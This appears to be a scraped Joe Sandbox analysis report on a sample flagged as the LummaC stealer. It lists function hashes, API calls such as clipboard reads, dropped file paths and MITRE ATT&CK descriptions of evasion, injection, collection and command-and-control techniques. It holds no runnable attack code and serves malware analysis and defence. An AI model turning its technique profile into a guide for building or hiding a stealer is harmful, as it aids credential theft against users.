Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction ID: 154994e6001f97f4ad747c0a24bc0bd04577490afe20482a75f289cee3ff7445
Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction Fuzzy Hash: D411A371608341ABD7149F29DD9067FBBE2EBC2354F19EE2CE59653790CA30C841CB0A

Function 009FEAA2 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction ID: 458c823fc51ed6a54cdefcf31e037649ce6da5e7b132b800136e40aa6c6c6693
Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction Fuzzy Hash: ED11E3747407844FD3188F24CCD2E62B7A2ABD6318719853CB8429BB93C66CEC09C764

Function 0040E83B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8

Function 00A170E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
Instruction ID: 1e508c19109f690289ecb7e150c7f2c6938486bb39b5b57f9162a3b16ff7e6b1
Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
Instruction Fuzzy Hash: CDF06DB5E0C3848BC718CF28C48067AFBE4AB9A700F10693DE48AE3341DB31D545CB4A

Function 00A17797 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
Instruction ID: 9eb83f70a9f4a3b6fca5e27be85fb580e9f1afd9fd44f396ca5b230b7b36fb72
Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
Instruction Fuzzy Hash: 54F046B410D3919FC300DF29D29051BFBE0ABD5318FA4AA5CE8DA5B212D334C9028B4A

Function 00A154D1 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
Instruction ID: c7ad2f68b0c15b939a73d3a20eb6129bb2eee434c6a4c2908bab826003c7ef59
Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
Instruction Fuzzy Hash: BEF0EDB1688301BAF6348A00DD43F6BB6B49B55B04F301528B344790E1E5E2B549870E

Function 0042526A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E

Function 00A2AD19 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction ID: 001cc82e3f3b6fbc713f0ebe7bfb5deed8cb6cdfdc17f795a23665b35cba77f5
Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction Fuzzy Hash: 50F0A735B456808BE704CF38E82195ABBE2E397324F145A7DD641D3751D639C8018605

Function 0043AAB2 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609

Function 00A163B6 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
Instruction ID: 3797ade831d34e95ca28bf8a0846ba522932db1933c5ccef964036b0196f4b47
Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
Instruction Fuzzy Hash: BED0972480C63AC30E2A0F1401100FCB7320A03701B8B51E5DCF1FF082CB72CC872258

Function 00A2C268 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19

Function 00A1559D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E

Function 00A2C79B Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C

Function 00A21337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A21347
GetWindowLongW.USER32 ref: 00A2136C
GetClipboardData.USER32 ref: 00A2137C
GlobalLock.KERNEL32 ref: 00A21395
GlobalUnlock.KERNEL32 ref: 00A214A7
CloseClipboard.USER32 ref: 00A214B0

Strings

x, xrefs: 00A213E4
(, xrefs: 00A21425
P, xrefs: 00A21402
j, xrefs: 00A21411
W, xrefs: 00A2140C
], xrefs: 00A213F8

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$W$]$j$x
API String ID: 2832541153-1642767450
Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
Instruction ID: 1df588a2e4b4aa928c64738671ede7438a04b52bc81610de26bc0feeadf8ebf3
Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
Instruction Fuzzy Hash: 12418E7190C7918ED301AF7C988836FBEE09B96314F084A7DE8D986392D6788648C793

Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004310E0
GetWindowLongW.USER32 ref: 00431105
GetClipboardData.USER32 ref: 00431115
GlobalLock.KERNEL32 ref: 0043112E
GlobalUnlock.KERNEL32 ref: 00431240
CloseClipboard.USER32 ref: 00431249

Strings

W, xrefs: 004311A5
x, xrefs: 0043117D
], xrefs: 00431191
j, xrefs: 004311AA
(, xrefs: 004311BE
P, xrefs: 0043119B

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ($P$W$]$j$x
API String ID: 2832541153-1642767450
Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797

Function 00A1FAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A1FAAC
VariantInit.OLEAUT32 ref: 00A1FABF

Strings

L, xrefs: 00A1FB41

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: L
API String ID: 2610073882-2909332022
Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction ID: d1f7fae1c21746ec1bf74ede152d38c0c07055f92415dc63a84ada7e01a4b631
Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction Fuzzy Hash: 7D412B7110CBC18ED321DB38845869EBFE16BE6220F188A9CE5F5873E2D6748549CB53

Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F845
VariantInit.OLEAUT32 ref: 0042F858

Strings

L, xrefs: 0042F8DA

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: L
API String ID: 2610073882-2909332022
Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53

Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004322EE
GetSystemMetrics.USER32 ref: 004322FD

Strings

, xrefs: 004323A8

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TN78WX7nJU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_C455.tmp.exe_f1f616141224abb4b1d772a683f13d364118c7b3_b072f3df_de633f55-c2b4-4d6b-a9f6-72a94082570a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1F1.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2DD.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD30C.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\C455.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
TN78WX7nJU.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0248003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre